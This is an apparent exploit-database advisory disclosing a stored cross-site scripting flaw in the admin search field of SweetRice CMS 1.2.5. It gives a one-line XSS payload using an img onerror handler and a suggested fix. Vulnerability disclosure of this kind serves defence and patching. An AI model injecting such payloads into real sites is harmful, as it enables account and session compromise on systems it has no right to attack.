Exploit Title:    SweetRice Cms Multiple Cross Site Scripting Vulnerabilities
# Date: 06/01/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link: http://www.basic-cms.org/
# Versions Affected: SweetRice 1.2.5
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Description:

The Vulnerabilities in admin area search option input in is not sanitized. Therefore it results
in a stored cross-site scripting.

POC:
http://www.youtube.com/watch?v=Jhyelw5ffdI&feature=youtu.be

Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>


##########################################################################################################
Fix:
Better sanitization by restricting special characters.

Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com